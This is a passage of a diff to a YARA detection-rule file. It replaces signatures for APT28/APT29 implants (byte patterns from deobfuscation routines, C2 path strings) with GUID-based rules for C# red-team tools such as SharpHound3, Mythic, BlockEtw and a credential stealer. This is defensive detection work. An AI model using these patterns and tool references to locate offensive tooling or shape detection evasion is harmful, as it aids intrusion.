+		$typelibguid17lo = "714ae6f3-0d03-4023-b753-fed6a31d95c7" ascii wide
+		$typelibguid17up = "714AE6F3-0D03-4023-B753-FED6A31D95C7" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_6_V2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Browserpass : FILE
 {
 	meta:
-		description = "Sednit / EVILTOSS Implant by APT28"
-		author = "US CERT"
-		id = "59bfbef2-ff0e-59df-9d08-15001cec8ecf"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1245-L1258"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "bad36c36-dbed-527c-a2f5-4dceff1abe4b"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/jabiel/BrowserPass"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4148-L4162"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7e81e8bcc305b9b7166db85d81278c96edf232bf60040ef15a2376f204ca3046"
-		score = 85
+		logic_hash = "70414002857991016ebd01889d6346b32a553525e06556f5273e53753c3caccc"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$obf_func = { 8B 45 F8 6A 07 03 C7 33 D2 89 45 E8 8D 47 01 5B 02 4D 0F F7 F3 6A 07 8A 04 32 33 D2 F6 E9 8A C8 8B C7 F7 F3 8A 44 3E FE 02 45 FC 02 0C 32 B2 03 F6 EA 8A D8 8D 47 FF 33 D2 5F F7 F7 02 5D 14 8B 45 E8 8B 7D F4 C0 E3 06 02 1C 32 32 CB 30 08 8B 4D 14 41 47 83 FF 09 89 4D 14 89 7D F4 72 A1 }
+		$typelibguid0lo = "3cb59871-0dce-453b-857a-2d1e515b0b66" ascii wide
+		$typelibguid0up = "3CB59871-0DCE-453B-857A-2D1E515B0B66" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_6_V3 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Mythic : FILE
 {
 	meta:
-		description = "Sednit / EVILTOSS Implant by APT28"
-		author = "US CERT"
-		id = "db090bc5-a90f-5b66-8fcb-29b423dddbf7"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1260-L1275"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "44237fac-1526-5587-83a1-61d7a54f7da9"
+		date = "2020-12-29"
+		modified = "2023-04-06"
+		reference = "https://github.com/its-a-feature/Mythic"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4164-L4180"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "833a6a3a4ff8ca43d4cf8053bfd1da49df96d9833dd3fe0f3ffbf6ce6c114681"
-		score = 85
+		logic_hash = "f75bb7695d0de67f562e1c1d7505e0f13e9192ccd7bf6f2128897f4a871430be"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$deob_func = { 8D 46 01 02 D1 83 E0 07 8A 04 38 F6 EA 8B D6 83 E2 07 0A
-         04 3A 33 D2 8A 54 37 FE 03 D3 03 D1 D3 EA 32 C2 8D 56 FF 83 E2 07 8A
-         1C 3A 8A 14 2E 32 C3 32 D0 41 88 14 2E 46 83 FE 0A 7C ?? }
+		$typelibguid0lo = "91f7a9da-f045-4239-a1e9-487ffdd65986" ascii wide
+		$typelibguid0up = "91F7A9DA-F045-4239-A1E9-487FFDD65986" ascii wide
+		$typelibguid1lo = "0405205c-c2a0-4f9a-a221-48b5c70df3b6" ascii wide
+		$typelibguid1up = "0405205C-C2A0-4F9A-A221-48B5C70DF3B6" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_6_V4 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Nuages : FILE
 {
 	meta:
-		description = "Sednit / EVILTOSS Implant by APT28"
-		author = "US CERT"
-		id = "27118ec8-3713-5670-88d2-3ac57c155c0d"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1277-L1291"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5ad947e2-bd71-50d4-9bbf-4d018c7ff36a"
+		date = "2020-12-29"
+		modified = "2023-04-06"
+		reference = "https://github.com/p3nt4/Nuages"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4182-L4196"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f5388668e148223bc94680ea84e83b0f2896ccf433523d171c8f46d7069f9a4b"
-		score = 85
+		logic_hash = "cf417eb45867b6fe77cf229688b3c210814a902949840ed946a9d9cff8c8a3d7"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ASM = {53 5? 5? [6-15] ff d? 8b ?? b? a0 86 01 00 [7-13] ff d? ?b
-         [6-10] c0 [0-1] c3}
+		$typelibguid0lo = "e9e80ac7-4c13-45bd-9bde-ca89aadf1294" ascii wide
+		$typelibguid0up = "E9E80AC7-4C13-45BD-9BDE-CA89AADF1294" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_6_V5 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsniper : FILE
 {
 	meta:
-		description = "Sednit / EVILTOSS Implant by APT28"
-		author = "US CERT"
-		id = "d035eaff-8c2a-53a2-b629-6448b2bcc9f6"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1293-L1327"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "14e6a3b8-5e1f-5dd8-9b51-22522ac317e7"
+		date = "2020-12-29"
+		modified = "2023-04-06"
+		reference = "https://github.com/HunnicCyber/SharpSniper"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4198-L4212"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b3ba650818ddbc58ce272ae4851ae3151a8cf1c9cc6f8e234a50b52c95d951fe"
-		score = 85
+		logic_hash = "5c2c67c24a8ad6ecfac03e9f5bad0731883503d974bf7a0ab313e31c30190fb5"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$STR1 = { 83 EC 18 8B 4C 24 24 B8 AB AA AA AA F7 E1 8B 44 24 20 53 55 8B
-         EA 8D 14 08 B8 AB AA AA AA 89 54 24 1C F7 E2 56 8B F2 C1 ED 02 8B DD
-         57 8B 7C 24 38 89 6C 24 1C C1 EE 02 3B DE 89 5C 24 18 89 74 24 20 0F
-         83 CF 00 00 00 8D 14 5B 8D 44 12 FE 89 44 24 10 3B DD 0F 85 CF 00 00
-         00 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B CA 83 F9 06 89 4C 24 38 0F 83
-         86 00 00 00 8A C3 B2 06 F6 EA 8B 54 24 10 88 44 24 30 8B 44 24 2C 8D
-         71 02 03 D0 89 54 24 14 8B 54 24 10 33 C0 8A 44 37 FE 03 D6 8B D8 8D
-         46 FF 0F AF DA 33 D2 BD 06 00 00 00 F7 F5 C1 EB 07 8A 04 3A 33 D2 32
-         D8 8D 46 01 F7 F5 8A 44 24 30 02 C1 8A 0C 3A 33 D2 32 C8 8B C6 F7 F5
-         8A 04 3A 22 C8 8B 44 24 14 02 D9 8A 0C 30 32 CB 88 0C 30 8B 4C 24 38
-         41 46 83 FE 08 89 4C 24 38 72 A1 8B 5C 24 18 8B 6C 24 1C 8B 74 24 20
-         8B 4C 24 10 43 83 C1 06 3B DE 89 4C 24 10 8B 4C 24 34 89 5C 24 18 0F
-         82 3C FF FF FF 3B DD 75 1A 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B CA EB
-         0D 33 C9 89 4C 24 38 E9 40 FF FF FF 33 C9 8B 44 24 24 33 D2 BE 06 00
-         00 00 89 4C 24 38 F7 F6 3B CA 89 54 24 24 0F 83 95 00 00 00 8A C3 B2
-         06 F6 EA 8D 1C 5B 88 44 24 30 8B 44 24 2C 8D 71 02 D1 E3 89 5C 24 34
-         8D 54 03 FE 89 54 24 14 EB 04 8B 5C 24 34 33 C0 BD 06 00 00 00 8A 44
-         3E FE 8B D0 8D 44 1E FE 0F AF D0 C1 EA 07 89 54 24 2C 8D 46 FF 33 D2
-         BB 06 00 00 00 F7 F3 8B 5C 24 2C 8A 04 3A 33 D2 32 D8 8D 46 01 F7 F5
-         8A 44 24 30 02 C1 8A 0C 3A 33 D2 32 C8 8B C6 F7 F5 8A 04 3A 22 C8 8B
-         44 24 14 02 D9 8A 0C 06 32 CB 88 0C 06 8B 4C 24 38 8B 44 24 24 41 46
-         3B C8 89 4C 24 38 72 8F 5F 5E 5D 5B 83 C4 18 C2 10 00 }
+		$typelibguid0lo = "c8bb840c-04ce-4b60-a734-faf15abf7b18" ascii wide
+		$typelibguid0up = "C8BB840C-04CE-4B60-A734-FAF15ABF7B18" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_6_V6 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharphound3 : FILE
 {
 	meta:
-		description = "Sednit / EVILTOSS Implant by APT28"
-		author = "US CERT"
-		id = "89cc3764-d60c-5cbd-af32-a90d8b3400d7"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1329-L1343"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "58001912-88a1-527d-9d3e-d7c376a1fce4"
+		date = "2020-12-29"
+		modified = "2023-04-06"
+		reference = "https://github.com/BloodHoundAD/SharpHound3"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4214-L4228"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "77b5f95cd897c82c200ee6fa3970824adccfd7c56639d92361095f919781d731"
-		score = 85
+		logic_hash = "0350505aa796cccc56092fb835269c5aad6de0096bbfc5d1608113e11827951a"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$Init1_fun = {68 10 27 00 00 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 6A FF 50
-         FF 15 ?? ?? ?? ?? 33 C0 C3}
+		$typelibguid0lo = "a517a8de-5834-411d-abda-2d0e1766539c" ascii wide
+		$typelibguid0up = "A517A8DE-5834-411D-ABDA-2D0E1766539C" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_7_V1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Blocketw : FILE
 {
 	meta:
-		description = "Implant 7 by APT29"
-		author = "US CERT"
-		id = "ce83c157-af03-55cb-a2be-0b6543fedb5b"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1368-L1381"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c2b72fef-6549-5b53-8ccf-232e8d152e96"
+		date = "2020-12-29"
+		modified = "2023-04-06"
+		reference = "https://github.com/Soledge/BlockEtw"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4230-L4244"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "996f81fe006e0ab15adab46275fdb60251e6c6616da33df600fadfc2684c24af"
-		score = 85
+		logic_hash = "4670091775772f66e82dd7c78ac8f307d301ce849424dabcaf495c46cd737d7f"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$STR1 = { 8A 44 0A 03 32 C3 0F B6 C0 66 89 04 4E 41 3B CF 72 EE }
-		$STR2 = { F3 0F 6F 04 08 66 0F EF C1 F3 0F 7F 04 11 83 C1 10 3B CF 72 EB }
+		$typelibguid0lo = "daedf7b3-8262-4892-adc4-425dd5f85bca" ascii wide
+		$typelibguid0up = "DAEDF7B3-8262-4892-ADC4-425DD5F85BCA" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( $STR1 or $STR2 )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_8_V1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpwifigrabber : FILE
 {
 	meta:
-		description = "HAMMERTOSS / HammerDuke Implant by APT29"
-		author = "US CERT"
-		id = "eeaa43c1-6004-5d64-bdc1-f84b3c68d741"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1383-L1411"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "1a457672-743c-56f0-a4d7-6c25f9ce2345"
+		date = "2020-12-29"
+		modified = "2023-04-06"
+		reference = "https://github.com/r3nhat/SharpWifiGrabber"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4246-L4260"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "437bda331405f9203747ffbfb107ec26e33973ebfc9f02e153697f7b8c22ad4f"
-		score = 65
+		logic_hash = "1924847602c4075779697f8b74dee48738f2a4e7852b2431c128e677f6c04407"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$DOTNET = "mscorlib" ascii
-		$REF_URL = "https://www.google.com/url?sa=" wide
-		$REF_var_1 = "&rct=" wide
-		$REF_var_2 = "&q=&esrc=" wide
-		$REF_var_3 = "&source=" wide
-		$REF_var_4 = "&cd=" wide
-		$REF_var_5 = "&ved=" wide
-		$REF_var_6 = "&url=" wide
-		$REF_var_7 = "&ei=" wide
-		$REF_var_8 = "&usg=" wide
-		$REF_var_9 = "&bvm=" wide
+		$typelibguid0lo = "c0997698-2b73-4982-b25b-d0578d1323c2" ascii wide
+		$typelibguid0up = "C0997698-2B73-4982-B25B-D0578D1323C2" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( $DOTNET ) and ( $REF_URL ) and ( 3 of ( $REF_var* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_9_V1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpmapexec : FILE
 {
 	meta:
-		description = "Onion Duke Implant by APT29"
-		author = "US CERT"
-		id = "5460ff29-681b-5d11-a6ba-5f294e8577e6"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1431-L1447"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b4922734-a486-5c4d-9bd7-5146cfecbf01"
+		date = "2020-12-29"
+		modified = "2023-04-06"
+		reference = "https://github.com/cube0x0/SharpMapExec"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4262-L4276"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "76704410af27060131ee4a5f46601b8badbf822d8084511145078607db715651"
-		score = 85
+		logic_hash = "49055d7159cf93e99b8e4ac53c29a66952955fa10457e7beca8e5e0277acec36"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$STR1 = { 8B 03 8A 54 01 03 32 55 FF 41 88 54 39 FF 3B CE 72 EE }
-		$STR2 = { 8B C8 83 E1 03 8A 54 19 08 8B 4D 08 32 54 01 04 40 88 54 38 FF
-         3B C6 72 E7 }
-		$STR3 = { 8B 55 F8 8B C8 83 E1 03 8A 4C 11 08 8B 55 FC 32 0C 10 8B 17 88
-         4C 02 04 40 3B 06 72 E3 }
+		$typelibguid0lo = "bd5220f7-e1fb-41d2-91ec-e4c50c6e9b9f" ascii wide
+		$typelibguid0up = "BD5220F7-E1FB-41D2-91EC-E4C50C6E9B9F" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_10_V2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_K8Fly : FILE
 {
 	meta:
-		description = "CozyDuke / CozyCar / CozyBear Implant by APT29"
-		author = "US CERT"
-		id = "9c6d4eb9-98a5-5c6d-ba3a-0ce7524c5d2a"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1468-L1481"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3421e6fb-df65-5e2e-ae46-37f9c763c6a1"
+		date = "2020-12-29"
+		modified = "2023-04-06"
+		reference = "https://github.com/zzwlpx/k8fly"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4278-L4292"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dc201d25b1d6cf8f88ae3bee18057902c4d64316aa9debc9248b0d8aa7f6d170"
-		score = 85
+		logic_hash = "16e9707f017aedf412ec98a466ec945e630ec1e294ee97e52a918d54be93db91"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xor = { 34 ?? 66 33 C1 48 FF C1 }
-		$nop = { 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00}
+		$typelibguid0lo = "13b6c843-f3d4-4585-b4f3-e2672a47931e" ascii wide
+		$typelibguid0up = "13B6C843-F3D4-4585-B4F3-E2672A47931E" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $xor and $nop
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Unidentified_Malware_Two
+rule SIGNATURE_BASE_HKTL_NET_GUID_Stealer : FILE
 {
 	meta:
-		description = "Unidentified Implant by APT29"
-		author = "US CERT"
-		id = "848f2d1f-e352-51c1-ac5d-841bf309f2f2"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1520-L1542"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c721a0ac-e898-52aa-9bdf-a19bc0bd783d"
+		date = "2020-12-29"
+		modified = "2023-04-06"
+		reference = "https://github.com/malwares/Stealer"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4294-L4312"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cd9adfb9e27e4d6b27498cc029e15132343f036cca60210528720a533fe20d9a"
-		score = 85
+		logic_hash = "541836ece736557383d209a424a0fa9fb9df69a669d8f1cf8d1bdb41bd27af57"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$my_string_one = "/zapoy/gate.php"
-		$my_string_two = { E3 40 FE 45 FD 0F B6 45 FD 0F B6 14 38 88 55 FF 00 55
-         FC 0F B6 45 FC 8A 14 38 88 55 FE 0F B6 45 FD 88 14 38 0F B6 45 FC 8A
-         55 FF 88 14 38 8A 55 FF 02 55 FE 8A 14 3A 8B 45 F8 30 14 30 }
-		$my_string_three = "S:\\Lidstone\\renewing\\HA\\disable\\In.pdb"
-		$my_string_four = { 8B CF 0F AF CE 8B C6 99 2B C2 8B 55 08 D1 F8 03 C8
-         8B 45 FC 03 C2 89 45 10 8A 00 2B CB 32 C1 85 DB 74 07 }
-		$my_string_five = "fuckyou1"
-		$my_string_six = "xtool.exe"
+		$typelibguid0lo = "8fcd4931-91a2-4e18-849b-70de34ab75df" ascii wide
+		$typelibguid0up = "8FCD4931-91A2-4E18-849B-70DE34AB75DF" ascii wide
+		$typelibguid1lo = "e48811ca-8af8-4e73-85dd-2045b9cca73a" ascii wide
+		$typelibguid1up = "E48811CA-8AF8-4E73-85DD-2045B9CCA73A" ascii wide
+		$typelibguid2lo = "d3d8a1cc-e123-4905-b3de-374749122fcf" ascii wide
+		$typelibguid2up = "D3D8A1CC-E123-4905-B3DE-374749122FCF" ascii wide
 
 	condition:
-		($my_string_one and $my_string_two ) or ( $my_string_three or $my_string_four ) or ( $my_string_five and $my_string_six )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_Sofacy_Campaign_Mal_Feb18_Cdnver : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Porttran : FILE
 {
 	meta:
-		description = "Detects Sofacy malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a5c72ddd-91b0-5410-9d81-38a138ec7efe"
-		date = "2018-02-07"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/ClearskySec/status/960924755355369472"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy.yar#L4-L27"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "844e58a2-54f5-51e8-8176-6a478a136603"
+		date = "2020-12-29"
+		modified = "2023-04-06"
+		reference = "https://github.com/k8gege/PortTran"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4314-L4330"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cd3fa21710054a96cc85da13d98e0882deaa574708c833349638b57b6088131c"
+		logic_hash = "9dda69710b7ff29e34181d694a4922f0da27e1959dd72031ac630a4851a48c62"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "12e6642cf6413bdf5388bee663080fa299591b2ba023d069286f3be9647547c8"
 
 	strings:
-		$x1 = "cdnver.dll" fullword wide
-		$x2 = { 25 73 0A 00 00 00 00 00 30 00 00 00 20 00 2D 00
-              20 00 00 00 0A 00 00 00 25 00 73 00 00 00 00 00
-              69 00 6D 00 61 00 67 00 65 00 2F 00 6A 00 70 00
-              65 00 67 }
-		$s1 = "S7%s - %lu" fullword ascii
-		$s2 = "SNFIRNW" fullword ascii
+		$typelibguid0lo = "3a074374-77e8-4312-8746-37f3cb00e82c" ascii wide
+		$typelibguid0up = "3A074374-77E8-4312-8746-37F3CB00E82C" ascii wide
+		$typelibguid1lo = "67a73bac-f59d-4227-9220-e20a2ef42782" ascii wide
+		$typelibguid1up = "67A73BAC-F59D-4227-9220-E20A2EF42782" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 90KB and ( pe.imphash ( ) == "01f3d0fe6fb9d9df24620e67afc143c7" or 1 of ( $x* ) or 2 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_Sofacy_Trojan_Loader_Feb18_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Gray_Keylogger_2 : FILE
 {
 	meta:
-		description = "Sofacy Activity Feb 2018"
-		author = "Florian Roth (Nextron Systems)"
-		id = "358d7a77-0ff5-572e-9cd8-b2cebaace02f"
-		date = "2018-03-01"
-		modified = "2023-12-05"
